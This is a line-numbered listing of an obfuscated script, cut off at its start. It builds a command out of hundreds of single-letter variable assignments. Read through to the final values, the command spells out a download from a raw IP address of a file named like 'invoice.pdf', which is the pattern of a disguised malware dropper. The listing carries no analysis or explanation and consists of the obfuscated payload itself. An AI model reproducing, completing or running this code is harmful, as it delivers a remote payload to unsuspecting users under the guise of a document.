ijyocrp + xjlnqb + oothclktd + ihqqb + ussuawv + jqydj + oxovk + tmcnxcmn + tmcnxcmn + oothclktd + aypktat + necpj + necpj + mnlknis + cpkduc + utbplg + xjlnqb + mnlknis + ebmeg + utbplg + xjlnqb + mnlknis + xjlnqb + gawiitw + fugrrxj + ezfvhdk + necpj + sxstn + zeypvjoc + yemsji + beqxcd + sxstn + vgeicyij + ijyocrp + xjlnqb + oothclktd + oxovk + oothclktd + iyxtpik + cfagp + cfagp + rlyfvd + tmcnxcmn + jibsnrniv + cjyxr + tmcnxcmn + jqydj + owbwgo + tmcnxcmn + ijyocrp + blciodyds + oothclktd + owbwgo + mljpuoyfe + sxstn + zeypvjoc + yemsji + beqxcd + sxstn + vgeicyij + ijyocrp + xjlnqb + oothclktd + ihqqb + ussuawv + cfagp + cfagp + vgeicyij + blciodyds + ihqqb + jqydj + necpj + vgeicyij + jqydj + zeypvjoc + ijyocrp + tmcnxcmn + jqydj + tpuaikxj + rlyfvd + ijyocrp + jqydj + mljpuoyfe + mljpuoyfe + mnlknis + cpkduc + utbplg + xjlnqb + mnlknis + ebmeg + utbplg + xjlnqb + mnlknis + xjlnqb + gawiitw + fugrrxj + ezfvhdk + fonnevso + hogvds + hogvds + hogvds + hogvds + mljpuoyfe + ihqqb + jibsnrniv + yemsji + tbhuiygje + tbhuiygje + tbhuiygje + cjyxr + beqxcd + beqxcd + tmcnxcmn + mljpuoyfe + cfagp + cfagp + vgeicyij + blciodyds + ihqqb + jqydj + necpj + vgeicyij + jqydj + cjyxr + ijyocrp + dixmflm + rlyfvd + yemsji + cjyxr + utbplg + gawiitw + jqydj + necpj + rlyfvd + jqydj + mljpuoyfe + mljpuoyfe + mnlknis + cpkduc + utbplg + xjlnqb + mnlknis + ebmeg + utbplg + xjlnqb + mnlknis + xjlnqb + gawiitw + fugrrxj + ezfvhdk + fonnevso + hogvds + hogvds + hogvds + hogvds + mljpuoyfe + ihqqb + jibsnrniv + yemsji + tbhuiygje + tbhuiygje + tbhuiygje + cjyxr + beqxcd + beqxcd + tmcnxcmn + mljpuoyfe + gawiitw + cpkduc + cpkduc + hogvds + gawiitw + ezfvhdk + ezfvhdk + eeufxlccw + gawiitw + gawiitw + utbplg + utbplg + utbplg + ezfvhdk + xjlnqb + ihqqb + fgekkckhu + fgekkckhu, 0, false ); |
|
14 | } | |
15 | owbwgo = "X"; | |
16 | owbwgo = "O"; | |
17 | owbwgo = "S"; | |
18 | owbwgo = "%"; | |
19 | gawiitw = "U"; | |
20 | gawiitw = "F"; | |
21 | gawiitw = "s"; | |
22 | gawiitw = "P"; | |
23 | gawiitw = "x"; | |
24 | gawiitw = "Q"; | |
25 | gawiitw = "d"; | |
26 | gawiitw = "y"; | |
27 | gawiitw = "P"; | |
28 | gawiitw = "d"; | |
29 | gawiitw = "Z"; | |
30 | gawiitw = "Q"; | |
31 | gawiitw = "M"; | |
32 | gawiitw = "n"; | |
33 | gawiitw = "d"; | |
34 | gawiitw = "N"; | |
35 | gawiitw = "V"; | |
36 | gawiitw = "M"; | |
37 | gawiitw = "K"; | |
38 | gawiitw = "v"; | |
39 | gawiitw = "q"; | |
40 | gawiitw = "V"; | |
41 | gawiitw = "x"; | |
42 | gawiitw = "r"; | |
43 | gawiitw = "X"; | |
44 | gawiitw = "E"; | |
45 | gawiitw = "D"; | |
46 | gawiitw = "Y"; | |
47 | gawiitw = "A"; | |
48 | gawiitw = "z"; | |
49 | gawiitw = "C"; | |
50 | gawiitw = "C"; | |
51 | gawiitw = "W"; | |
52 | gawiitw = "2"; | |
53 | jqkdwo = "J"; | |
54 | jqkdwo = "o"; | |
55 | jqkdwo = "W"; | |
56 | jqkdwo = "y"; | |
57 | jqkdwo = "z"; | |
58 | jqkdwo = "X"; | |
59 | jqkdwo = "Y"; | |
60 | jqkdwo = "I"; | |
61 | jqkdwo = "Y"; | |
62 | jqkdwo = "T"; | |
63 | jqkdwo = "f"; | |
64 | jqkdwo = "b"; | |
65 | jqkdwo = "T"; | |
66 | dbcfuc = "f"; | |
67 | dbcfuc = "f"; | |
68 | dbcfuc = "L"; | |
69 | dbcfuc = "E"; | |
70 | dbcfuc = "m"; | |
71 | dbcfuc = "K"; | |
72 | beqxcd = "L"; | |
73 | beqxcd = "l"; | |
74 | beqxcd = "B"; | |
75 | beqxcd = "o"; | |
76 | jybei = "D"; | |
77 | jybei = "m"; | |
78 | jybei = "j"; | |
79 | jybei = "I"; | |
80 | jybei = "b"; | |
81 | jybei = "X"; | |
82 | jybei = "o"; | |
83 | jybei = "w"; | |
84 | jybei = "W"; | |
85 | yemsji = "d"; | |
86 | yemsji = "j"; | |
87 | yemsji = "d"; | |
88 | yemsji = "M"; | |
89 | yemsji = "p"; | |
90 | yemsji = "p"; | |
91 | yemsji = "V"; | |
92 | yemsji = "p"; | |
93 | yemsji = "J"; | |
94 | yemsji = "N"; | |
95 | yemsji = "u"; | |
96 | yemsji = "S"; | |
97 | yemsji = "Y"; | |
98 | yemsji = "T"; | |
99 | yemsji = "Q"; | |
100 | yemsji = "w"; | |
101 | yemsji = "w"; | |
102 | yemsji = "s"; | |
103 | yemsji = "V"; | |
104 | yemsji = "s"; | |
105 | yemsji = "b"; | |
106 | yemsji = "c"; | |
107 | yemsji = "f"; | |
108 | yemsji = "T"; | |
109 | yemsji = "v"; | |
110 | yemsji = "s"; | |
111 | yemsji = "B"; | |
112 | yemsji = "x"; | |
113 | yemsji = "e"; | |
114 | yemsji = "i"; | |
115 | yemsji = "b"; | |
116 | yemsji = "d"; | |
117 | yemsji = "N"; | |
118 | yemsji = "R"; | |
119 | yemsji = "i"; | |
120 | yemsji = "D"; | |
121 | yemsji = "x"; | |
122 | yemsji = "f"; | |
123 | yemsji = "e"; | |
124 | yemsji = "Z"; | |
125 | yemsji = "O"; | |
126 | yemsji = "W"; | |
127 | yemsji = "P"; | |
128 | yemsji = "F"; | |
129 | yemsji = "v"; | |
130 | xjlnqb = "h"; | |
131 | xjlnqb = "E"; | |
132 | xjlnqb = "a"; | |
133 | xjlnqb = "g"; | |
134 | xjlnqb = "H"; | |
135 | xjlnqb = "."; | |
136 | tmcnxcmn = "q"; | |
137 | tmcnxcmn = "r"; | |
138 | tmcnxcmn = "h"; | |
139 | tmcnxcmn = "q"; | |
140 | tmcnxcmn = "P"; | |
141 | tmcnxcmn = "X"; | |
142 | tmcnxcmn = "N"; | |
143 | tmcnxcmn = "m"; | |
144 | tmcnxcmn = "G"; | |
145 | tmcnxcmn = "E"; | |
146 | tmcnxcmn = "K"; | |
147 | tmcnxcmn = "F"; | |
148 | tmcnxcmn = "w"; | |
149 | tmcnxcmn = "d"; | |
150 | tmcnxcmn = "r"; | |
151 | tmcnxcmn = "T"; | |
152 | tmcnxcmn = "C"; | |
153 | tmcnxcmn = "h"; | |
154 | tmcnxcmn = "q"; | |
155 | tmcnxcmn = "z"; | |
156 | tmcnxcmn = "J"; | |
157 | tmcnxcmn = "N"; | |
158 | tmcnxcmn = "m"; | |
159 | tmcnxcmn = "a"; | |
160 | tmcnxcmn = "p"; | |
161 | tmcnxcmn = "B"; | |
162 | tmcnxcmn = "l"; | |
163 | tmcnxcmn = "C"; | |
164 | tmcnxcmn = "o"; | |
165 | tmcnxcmn = "U"; | |
166 | tmcnxcmn = "m"; | |
167 | tmcnxcmn = "T"; | |
168 | tmcnxcmn = "d"; | |
169 | tmcnxcmn = "A"; | |
170 | tmcnxcmn = "a"; | |
171 | tmcnxcmn = "n"; | |
172 | tmcnxcmn = "t"; | |
173 | tmcnxcmn = "j"; | |
174 | tmcnxcmn = "c"; | |
175 | tmcnxcmn = "Q"; | |
176 | tmcnxcmn = "b"; | |
177 | tmcnxcmn = "t"; | |
178 | brxjuxlya = "_"; | |
179 | ussuawv = "p"; | |
180 | ussuawv = "B"; | |
181 | ussuawv = "y"; | |
182 | ussuawv = "m"; | |
183 | ussuawv = "B"; | |
184 | ussuawv = "A"; | |
185 | ussuawv = "P"; | |
186 | ussuawv = "L"; | |
187 | ussuawv = "x"; | |
188 | ussuawv = "P"; | |
189 | ussuawv = "K"; | |
190 | ussuawv = "D"; | |
191 | ussuawv = "J"; | |
192 | ussuawv = "u"; | |
193 | ussuawv = "e"; | |
194 | ussuawv = "S"; | |
195 | ussuawv = "N"; | |
196 | ussuawv = "r"; | |
197 | ussuawv = "t"; | |
198 | ussuawv = "Q"; | |
199 | ussuawv = "S"; | |
200 | ussuawv = "M"; | |
201 | ussuawv = "N"; | |
202 | ussuawv = "H"; | |
203 | ussuawv = "Y"; | |
204 | ussuawv = "S"; | |
205 | ussuawv = "u"; | |
206 | ussuawv = "e"; | |
207 | ussuawv = "P"; | |
208 | ussuawv = "N"; | |
209 | ussuawv = "T"; | |
210 | ussuawv = "A"; | |
211 | ussuawv = "E"; | |
212 | ussuawv = "v"; | |
213 | ussuawv = "u"; | |
214 | ussuawv = "g"; | |
215 | ussuawv = "w"; | |
216 | ussuawv = "f"; | |
217 | zeypvjoc = "X"; | |
218 | zeypvjoc = "R"; | |
219 | zeypvjoc = "a"; | |
220 | zeypvjoc = "j"; | |
221 | zeypvjoc = "N"; | |
222 | zeypvjoc = "L"; | |
223 | zeypvjoc = "U"; | |
224 | zeypvjoc = "X"; | |
225 | zeypvjoc = "U"; | |
226 | zeypvjoc = "s"; | |
227 | zeypvjoc = "t"; | |
228 | zeypvjoc = "J"; | |
229 | zeypvjoc = "k"; | |
230 | zeypvjoc = "n"; | |
231 | zeypvjoc = "H"; | |
232 | zeypvjoc = "k"; | |
233 | zeypvjoc = "X"; | |
234 | zeypvjoc = "m"; | |
235 | zeypvjoc = "x"; | |
236 | zeypvjoc = "r"; | |
237 | zeypvjoc = "Z"; | |
238 | zeypvjoc = "R"; | |
239 | zeypvjoc = "d"; | |
240 | zeypvjoc = "i"; | |
241 | zeypvjoc = "M"; | |
242 | zeypvjoc = "v"; | |
243 | zeypvjoc = "Q"; | |
244 | zeypvjoc = "A"; | |
245 | zeypvjoc = "y"; | |
246 | zeypvjoc = "N"; | |
247 | zeypvjoc = "e"; | |
248 | zeypvjoc = "x"; | |
249 | zeypvjoc = "L"; | |
250 | zeypvjoc = "n"; | |
251 | ijyocrp = "s"; | |
252 | ijyocrp = "P"; | |
253 | ijyocrp = "R"; | |
254 | ijyocrp = "a"; | |
255 | ijyocrp = "o"; | |
256 | ijyocrp = "e"; | |
257 | ijyocrp = "r"; | |
258 | ijyocrp = "V"; | |
259 | ijyocrp = "j"; | |
260 | ijyocrp = "E"; | |
261 | ijyocrp = "o"; | |
262 | ijyocrp = "t"; | |
263 | ijyocrp = "U"; | |
264 | ijyocrp = "F"; | |
265 | ijyocrp = "K"; | |
266 | ijyocrp = "e"; | |
267 | eqefsi = "d"; | |
268 | eqefsi = "p"; | |
269 | eqefsi = "d"; | |
270 | eqefsi = "v"; | |
271 | eqefsi = "F"; | |
272 | eqefsi = "N"; | |
273 | eqefsi = "w"; | |
274 | eqefsi = "J"; | |
275 | eqefsi = "W"; | |
276 | eqefsi = "H"; | |
277 | eqefsi = "b"; | |
278 | eqefsi = "K"; | |
279 | eqefsi = "J"; | |
280 | eqefsi = "H"; | |
281 | eqefsi = "H"; | |
282 | eqefsi = "t"; | |
283 | eqefsi = "q"; | |
284 | mnlknis = "N"; | |
285 | mnlknis = "1"; | |
286 | hydyychb = "R"; | |
287 | hydyychb = "N"; | |
288 | hydyychb = "U"; | |
289 | hydyychb = "J"; | |
290 | hydyychb = "O"; | |
291 | oothclktd = "y"; | |
292 | oothclktd = "x"; | |
293 | oothclktd = "J"; | |
294 | oothclktd = "R"; | |
295 | oothclktd = "p"; | |
296 | oothclktd = "c"; | |
297 | oothclktd = "D"; | |
298 | oothclktd = "C"; | |
299 | oothclktd = "z"; | |
300 | oothclktd = "i"; | |
301 | oothclktd = "K"; | |
302 | oothclktd = "A"; | |
303 | oothclktd = "W"; | |
304 | oothclktd = "d"; | |
305 | oothclktd = "a"; | |
306 | oothclktd = "x"; | |
307 | oothclktd = "S"; | |
308 | oothclktd = "r"; | |
309 | oothclktd = "o"; | |
310 | oothclktd = "p"; | |
311 | oothclktd = "H"; | |
312 | oothclktd = "E"; | |
313 | oothclktd = "I"; | |
314 | oothclktd = "W"; | |
315 | oothclktd = "H"; | |
316 | oothclktd = "p"; | |
317 | cpkduc = "X"; | |
318 | cpkduc = "S"; | |
319 | cpkduc = "H"; | |
320 | cpkduc = "R"; | |
321 | cpkduc = "O"; | |
322 | cpkduc = "g"; | |
323 | cpkduc = "l"; | |
324 | cpkduc = "e"; | |
325 | cpkduc = "M"; | |
326 | cpkduc = "r"; | |
327 | cpkduc = "v"; | |
328 | cpkduc = "f"; | |
329 | cpkduc = "F"; | |
330 | cpkduc = "O"; | |
331 | cpkduc = "E"; | |
332 | cpkduc = "U"; | |
333 | cpkduc = "G"; | |
334 | cpkduc = "l"; | |
335 | cpkduc = "d"; | |
336 | cpkduc = "9"; | |
337 | jibsnrniv = "U"; | |
338 | jibsnrniv = "u"; | |
339 | jibsnrniv = "u"; | |
340 | jibsnrniv = "P"; | |
341 | jibsnrniv = "g"; | |
342 | jibsnrniv = "s"; | |
343 | jibsnrniv = "a"; | |
344 | tpuaikxj = "T"; | |
345 | tpuaikxj = "U"; | |
346 | tpuaikxj = "G"; | |
347 | tpuaikxj = "u"; | |
348 | frnzwfdg = "b"; | |
349 | frnzwfdg = "M"; | |
350 | frnzwfdg = "E"; | |
351 | frnzwfdg = "P"; | |
352 | frnzwfdg = "P"; | |
353 | frnzwfdg = "z"; | |
354 | frnzwfdg = "k"; | |
355 | frnzwfdg = "S"; | |
356 | frnzwfdg = "K"; | |
357 | frnzwfdg = "S"; | |
358 | frnzwfdg = "D"; | |
359 | frnzwfdg = "e"; | |
360 | frnzwfdg = "r"; | |
361 | frnzwfdg = "z"; | |
362 | frnzwfdg = "C"; | |
363 | frnzwfdg = "m"; | |
364 | frnzwfdg = "Y"; | |
365 | frnzwfdg = "i"; | |
366 | frnzwfdg = "s"; | |
367 | frnzwfdg = "W"; | |
368 | frnzwfdg = "a"; | |
369 | frnzwfdg = "a"; | |
370 | frnzwfdg = "z"; | |
371 | frnzwfdg = "Z"; | |
372 | frnzwfdg = "R"; | |
373 | frnzwfdg = "H"; | |
374 | frnzwfdg = "U"; | |
375 | nqvxxrior = "q"; | |
376 | nqvxxrior = "Y"; | |
377 | nqvxxrior = "K"; | |
378 | nqvxxrior = "a"; | |
379 | nqvxxrior = "U"; | |
380 | nqvxxrior = "O"; | |
381 | nqvxxrior = "B"; | |
382 | nqvxxrior = "E"; | |
383 | nqvxxrior = "O"; | |
384 | nqvxxrior = "I"; | |
385 | nqvxxrior = "p"; | |
386 | nqvxxrior = "i"; | |
387 | nqvxxrior = "f"; | |
388 | nqvxxrior = "S"; | |
389 | nqvxxrior = "j"; | |
390 | nqvxxrior = "d"; | |
391 | nqvxxrior = "j"; | |
392 | nqvxxrior = "l"; | |
393 | nqvxxrior = "E"; | |
394 | nqvxxrior = "u"; | |
395 | nqvxxrior = "n"; | |
396 | nqvxxrior = "U"; | |
397 | nqvxxrior = "n"; | |
398 | nqvxxrior = "f"; | |
399 | nqvxxrior = "E"; | |
400 | nqvxxrior = "g"; | |
401 | nqvxxrior = "n"; | |
402 | nqvxxrior = "b"; | |
403 | nqvxxrior = "S"; | |
404 | ctguf = "H"; | |
405 | ctguf = "o"; | |
406 | ctguf = "B"; | |
407 | ctguf = "V"; | |
408 | ctguf = "Z"; | |
409 | ctguf = "Z"; | |
410 | ctguf = "A"; | |
411 | ctguf = "g"; | |
412 | ctguf = "K"; | |
413 | ctguf = "g"; | |
414 | ctguf = "e"; | |
415 | ctguf = "Z"; | |
416 | ctguf = "H"; | |
417 | ctguf = "D"; | |
418 | ctguf = "f"; | |
419 | ctguf = "z"; | |
420 | ctguf = "d"; | |
421 | ctguf = "I"; | |
422 | ctguf = "J"; | |
423 | ctguf = "c"; | |
424 | ctguf = "j"; | |
425 | sceltlaoj = "k"; | |
426 | sceltlaoj = "Y"; | |
427 | sceltlaoj = "Q"; | |
428 | sceltlaoj = "j"; | |
429 | sceltlaoj = "z"; | |
430 | sceltlaoj = "G"; | |
431 | sceltlaoj = "X"; | |
432 | sceltlaoj = "b"; | |
433 | sceltlaoj = "E"; | |
434 | sceltlaoj = "d"; | |
435 | sceltlaoj = "r"; | |
436 | sceltlaoj = "O"; | |
437 | sceltlaoj = "F"; | |
438 | sceltlaoj = "T"; | |
439 | sceltlaoj = "G"; | |
440 | sceltlaoj = "R"; | |
441 | sceltlaoj = "K"; | |
442 | sceltlaoj = "T"; | |
443 | sceltlaoj = "M"; | |
444 | sceltlaoj = "y"; | |
445 | sceltlaoj = "k"; | |
446 | sceltlaoj = "y"; | |
447 | sceltlaoj = "W"; | |
448 | sceltlaoj = "b"; | |
449 | sceltlaoj = "n"; | |
450 | sceltlaoj = "N"; | |
451 | sceltlaoj = "U"; | |
452 | sceltlaoj = "T"; | |
453 | sceltlaoj = "U"; | |
454 | sceltlaoj = "t"; | |
455 | sceltlaoj = "J"; | |
456 | sceltlaoj = "P"; | |
457 | sceltlaoj = "T"; | |
458 | sceltlaoj = "S"; | |
459 | sceltlaoj = "b"; | |
460 | sceltlaoj = "O"; | |
461 | sceltlaoj = "z"; | |
462 | sceltlaoj = "a"; | |
463 | sceltlaoj = "I"; | |
464 | sceltlaoj = "k"; | |
465 | aypktat = "i"; | |
466 | aypktat = "n"; | |
467 | aypktat = "N"; | |
468 | aypktat = "Z"; | |
469 | aypktat = "T"; | |
470 | aypktat = "e"; | |
471 | aypktat = "w"; | |
472 | aypktat = "y"; | |
473 | aypktat = "h"; | |
474 | aypktat = "b"; | |
475 | aypktat = "E"; | |
476 | aypktat = "j"; | |
477 | aypktat = "O"; | |
478 | aypktat = "F"; | |
479 | aypktat = "S"; | |
480 | aypktat = "Q"; | |
481 | aypktat = "O"; | |
482 | aypktat = "R"; | |
483 | aypktat = "D"; | |
484 | aypktat = "g"; | |
485 | aypktat = "i"; | |
486 | aypktat = "c"; | |
487 | aypktat = "V"; | |
488 | aypktat = "T"; | |
489 | aypktat = ":"; | |
490 | tbhuiygje = "f"; | |
491 | tbhuiygje = "O"; | |
492 | tbhuiygje = "J"; | |
493 | tbhuiygje = "W"; | |
494 | tbhuiygje = "w"; | |
495 | tbhuiygje = "v"; | |
496 | tbhuiygje = "w"; | |
497 | ihqqb = "I"; | |
498 | ihqqb = "B"; | |
499 | ihqqb = "K"; | |
500 | ihqqb = "E"; | |
501 | ihqqb = "q"; | |
502 | ihqqb = "l"; | |
503 | ihqqb = "L"; | |
504 | ihqqb = "D"; | |
505 | ihqqb = "S"; | |
506 | ihqqb = "T"; | |
507 | ihqqb = "I"; | |
508 | ihqqb = "z"; | |
509 | ihqqb = "P"; | |
510 | ihqqb = "I"; | |
511 | ihqqb = "Y"; | |
512 | ihqqb = "n"; | |
513 | ihqqb = "s"; | |
514 | ihqqb = "k"; | |
515 | ihqqb = "g"; | |
516 | ihqqb = "a"; | |
517 | ihqqb = "T"; | |
518 | ihqqb = "Y"; | |
519 | ihqqb = "P"; | |
520 | ihqqb = "I"; | |
521 | ihqqb = "d"; | |
522 | jhxreo = "D"; | |
523 | jhxreo = "y"; | |
524 | jhxreo = "C"; | |
525 | jhxreo = "K"; | |
526 | jhxreo = "w"; | |
527 | jhxreo = "Z"; | |
528 | jhxreo = "j"; | |
529 | jhxreo = "E"; | |
530 | jhxreo = "a"; | |
531 | jhxreo = "o"; | |
532 | jhxreo = "a"; | |
533 | jhxreo = "A"; | |
534 | jhxreo = "x"; | |
535 | jhxreo = "U"; | |
536 | jhxreo = "b"; | |
537 | jhxreo = "E"; | |
538 | jhxreo = "I"; | |
539 | jhxreo = "m"; | |
540 | jhxreo = "b"; | |
541 | fgekkckhu = "C"; | |
542 | fgekkckhu = "b"; | |
543 | fgekkckhu = "k"; | |
544 | fgekkckhu = "L"; | |
545 | fgekkckhu = "h"; | |
546 | fgekkckhu = "y"; | |
547 | fgekkckhu = "l"; | |
548 | fgekkckhu = "v"; | |
549 | fgekkckhu = "j"; | |
550 | fgekkckhu = "D"; | |
551 | fgekkckhu = "B"; | |
552 | fgekkckhu = "b"; | |
553 | fgekkckhu = "l"; | |
554 | aonjf = "N"; | |
555 | utbplg = "S"; | |
556 | utbplg = "o"; | |
557 | utbplg = "x"; | |
558 | utbplg = "C"; | |
559 | utbplg = "E"; | |
560 | utbplg = "b"; | |
561 | utbplg = "m"; | |
562 | utbplg = "H"; | |
563 | utbplg = "p"; | |
564 | utbplg = "u"; | |
565 | utbplg = "A"; | |
566 | utbplg = "w"; | |
567 | utbplg = "O"; | |
568 | utbplg = "S"; | |
569 | utbplg = "Q"; | |
570 | utbplg = "L"; | |
571 | utbplg = "g"; | |
572 | utbplg = "l"; | |
573 | utbplg = "p"; | |
574 | utbplg = "g"; | |
575 | utbplg = "G"; | |
576 | utbplg = "U"; | |
577 | utbplg = "h"; | |
578 | utbplg = "x"; | |
579 | utbplg = "B"; | |
580 | utbplg = "t"; | |
581 | utbplg = "E"; | |
582 | utbplg = "U"; | |
583 | utbplg = "Y"; | |
584 | utbplg = "u"; | |
585 | utbplg = "x"; | |
586 | utbplg = "U"; | |
587 | utbplg = "z"; | |
588 | utbplg = "c"; | |
589 | utbplg = "e"; | |
590 | utbplg = "S"; | |
591 | utbplg = "K"; | |
592 | utbplg = "o"; | |
593 | utbplg = "g"; | |
594 | utbplg = "w"; | |
595 | utbplg = "w"; | |
596 | utbplg = "a"; | |
597 | utbplg = "3"; | |
598 | iyxtpik = "w"; | |
599 | iyxtpik = "W"; | |
600 | iyxtpik = "J"; | |
601 | iyxtpik = "B"; | |
602 | iyxtpik = "O"; | |
603 | iyxtpik = "e"; | |
604 | iyxtpik = "G"; | |
605 | iyxtpik = "c"; | |
606 | iyxtpik = "a"; | |
607 | iyxtpik = "K"; | |
608 | iyxtpik = "v"; | |
609 | iyxtpik = "e"; | |
610 | iyxtpik = "f"; | |
611 | iyxtpik = "W"; | |
612 | iyxtpik = "N"; | |
613 | iyxtpik = "z"; | |
614 | iyxtpik = "\""; | |
615 | gjrdtfitk = "o"; | |
616 | gjrdtfitk = "V"; | |
617 | gjrdtfitk = "r"; | |
618 | gjrdtfitk = "E"; | |
619 | gjrdtfitk = "D"; | |
620 | gjrdtfitk = "K"; | |
621 | gjrdtfitk = "q"; | |
622 | gjrdtfitk = "i"; | |
623 | gjrdtfitk = "D"; | |
624 | gjrdtfitk = "O"; | |
625 | gjrdtfitk = "a"; | |
626 | gjrdtfitk = "L"; | |
627 | gjrdtfitk = "r"; | |
628 | gjrdtfitk = "L"; | |
629 | gjrdtfitk = "X"; | |
630 | gjrdtfitk = "o"; | |
631 | gjrdtfitk = "z"; | |
632 | gjrdtfitk = "A"; | |
633 | gjrdtfitk = "n"; | |
634 | gjrdtfitk = "c"; | |
635 | gjrdtfitk = "L"; | |
636 | gjrdtfitk = "T"; | |
637 | gjrdtfitk = "F"; | |
638 | gjrdtfitk = "O"; | |
639 | gjrdtfitk = "c"; | |
640 | gjrdtfitk = "Z"; | |
641 | gjrdtfitk = "F"; | |
642 | gjrdtfitk = "U"; | |
643 | gjrdtfitk = "h"; | |
644 | gjrdtfitk = "h"; | |
645 | gjrdtfitk = "D"; | |
646 | gjrdtfitk = "d"; | |
647 | gjrdtfitk = "K"; | |
648 | gjrdtfitk = "h"; | |
649 | gjrdtfitk = "S"; | |
650 | gjrdtfitk = "e"; | |
651 | gjrdtfitk = "e"; | |
652 | gjrdtfitk = "l"; | |
653 | gjrdtfitk = "d"; | |
654 | gjrdtfitk = "n"; | |
655 | gjrdtfitk = "f"; | |
656 | gjrdtfitk = "y"; | |
657 | gjrdtfitk = "Q"; | |
658 | gjrdtfitk = "H"; | |
659 | xaizcy = "X"; | |
660 | xaizcy = "o"; | |
661 | xaizcy = "T"; | |
662 | xaizcy = "u"; | |
663 | xaizcy = "K"; | |
664 | xaizcy = "r"; | |
665 | xaizcy = "c"; | |
666 | xaizcy = "Z"; | |
667 | xaizcy = "b"; | |
668 | xaizcy = "P"; | |
669 | xaizcy = "z"; | |
670 | xaizcy = "K"; | |
671 | xaizcy = "o"; | |
672 | xaizcy = "a"; | |
673 | xaizcy = "h"; | |
674 | xaizcy = "b"; | |
675 | xaizcy = "W"; | |
676 | xaizcy = "e"; | |
677 | xaizcy = "G"; | |
678 | xaizcy = "k"; | |
679 | xaizcy = "N"; | |
680 | xaizcy = "H"; | |
681 | xaizcy = "F"; | |
682 | xaizcy = "o"; | |
683 | xaizcy = "E"; | |
684 | xaizcy = "W"; | |
685 | xaizcy = "R"; | |
686 | xaizcy = "u"; | |
687 | xaizcy = "Q"; | |
688 | xaizcy = "E"; | |
689 | xaizcy = "W"; | |
690 | xaizcy = "n"; | |
691 | xaizcy = "Q"; | |
692 | xaizcy = "P"; | |
693 | xaizcy = "X"; | |
694 | xaizcy = "l"; | |
695 | xaizcy = "E"; | |
696 | xaizcy = "F"; | |
697 | sxstn = "l"; | |
698 | sxstn = "e"; | |
699 | sxstn = "m"; | |
700 | sxstn = "k"; | |
701 | sxstn = "E"; | |
702 | sxstn = "k"; | |
703 | sxstn = "E"; | |
704 | sxstn = "i"; | |
705 | blciodyds = "s"; | |
706 | blciodyds = "p"; | |
707 | blciodyds = "Z"; | |
708 | blciodyds = "v"; | |
709 | blciodyds = "K"; | |
710 | blciodyds = "h"; | |
711 | blciodyds = "S"; | |
712 | blciodyds = "O"; | |
713 | blciodyds = "P"; | |
714 | blciodyds = "m"; | |
715 | blciodyds = "W"; | |
716 | blciodyds = "a"; | |
717 | blciodyds = "G"; | |
718 | blciodyds = "n"; | |
719 | blciodyds = "r"; | |
720 | blciodyds = "H"; | |
721 | blciodyds = "S"; | |
722 | blciodyds = "H"; | |
723 | blciodyds = "m"; | |
724 | rlyfvd = "s"; | |
725 | rlyfvd = "O"; | |
726 | rlyfvd = "a"; | |
727 | rlyfvd = "g"; | |
728 | rlyfvd = "u"; | |
729 | rlyfvd = "D"; | |
730 | rlyfvd = "D"; | |
731 | rlyfvd = "D"; | |
732 | rlyfvd = "K"; | |
733 | rlyfvd = "M"; | |
734 | rlyfvd = "y"; | |
735 | rlyfvd = "s"; | |
736 | rlyfvd = "b"; | |
737 | rlyfvd = "f"; | |
738 | rlyfvd = "T"; | |
739 | rlyfvd = "w"; | |
740 | rlyfvd = "e"; | |
741 | rlyfvd = "G"; | |
742 | rlyfvd = "o"; | |
743 | rlyfvd = "G"; | |
744 | rlyfvd = "h"; | |
745 | rlyfvd = "h"; | |
746 | rlyfvd = "v"; | |
747 | rlyfvd = "a"; | |
748 | rlyfvd = "e"; | |
749 | rlyfvd = "y"; | |
750 | rlyfvd = "I"; | |
751 | rlyfvd = "q"; | |
752 | rlyfvd = "g"; | |
753 | rlyfvd = "M"; | |
754 | rlyfvd = "X"; | |
755 | rlyfvd = "Y"; | |
756 | rlyfvd = "g"; | |
757 | rlyfvd = "E"; | |
758 | rlyfvd = "f"; | |
759 | rlyfvd = "L"; | |
760 | rlyfvd = "a"; | |
761 | rlyfvd = "U"; | |
762 | rlyfvd = "K"; | |
763 | rlyfvd = "k"; | |
764 | rlyfvd = "d"; | |
765 | rlyfvd = "x"; | |
766 | rlyfvd = "s"; | |
767 | ezfvhdk = "G"; | |
768 | ezfvhdk = "V"; | |
769 | ezfvhdk = "O"; | |
770 | ezfvhdk = "B"; | |
771 | ezfvhdk = "5"; | |
772 | onvyp = "O"; | |
773 | onvyp = "J"; | |
774 | onvyp = "o"; | |
775 | onvyp = "g"; | |
776 | onvyp = "l"; | |
777 | onvyp = "J"; | |
778 | onvyp = "H"; | |
779 | onvyp = "k"; | |
780 | onvyp = "p"; | |
781 | onvyp = "Z"; | |
782 | onvyp = "i"; | |
783 | onvyp = "s"; | |
784 | onvyp = "e"; | |
785 | onvyp = "r"; | |
786 | onvyp = "I"; | |
787 | onvyp = "l"; | |
788 | onvyp = "b"; | |
789 | onvyp = "C"; | |
790 | onvyp = "x"; | |
791 | onvyp = "S"; | |
792 | onvyp = "b"; | |
793 | onvyp = "D"; | |
794 | onvyp = "u"; | |
795 | onvyp = "Y"; | |
796 | oxovk = "C"; | |
797 | oxovk = "d"; | |
798 | oxovk = "a"; | |
799 | oxovk = "q"; | |
800 | oxovk = "k"; | |
801 | oxovk = "D"; | |
802 | oxovk = "B"; | |
803 | oxovk = "V"; | |
804 | oxovk = "q"; | |
805 | oxovk = "Y"; | |
806 | oxovk = "h"; | |
807 | vpbjzcgeu = "-"; | |
808 | eanrf = "S"; | |
809 | eanrf = "Q"; | |
810 | eanrf = "X"; | |
811 | eanrf = "h"; | |
812 | eanrf = "B"; | |
813 | eanrf = "I"; | |
814 | vgeicyij = "C"; | |
815 | vgeicyij = "b"; | |
816 | vgeicyij = "l"; | |
817 | vgeicyij = "Q"; | |
818 | vgeicyij = "I"; | |
819 | vgeicyij = "U"; | |
820 | vgeicyij = "r"; | |
821 | vgeicyij = "G"; | |
822 | vgeicyij = "m"; | |
823 | vgeicyij = "N"; | |
824 | vgeicyij = "H"; | |
825 | vgeicyij = "c"; | |
826 | vgeicyij = "e"; | |
827 | vgeicyij = "J"; | |
828 | vgeicyij = "A"; | |
829 | vgeicyij = "A"; | |
830 | vgeicyij = "x"; | |
831 | vgeicyij = "c"; | |
832 | vgeicyij = "P"; | |
833 | vgeicyij = "i"; | |
834 | vgeicyij = "c"; | |
835 | jqydj = "d"; | |
836 | jqydj = "w"; | |
837 | jqydj = "C"; | |
838 | jqydj = " "; | |
839 | mljpuoyfe = "H"; | |
840 | mljpuoyfe = "X"; | |
841 | mljpuoyfe = "J"; | |
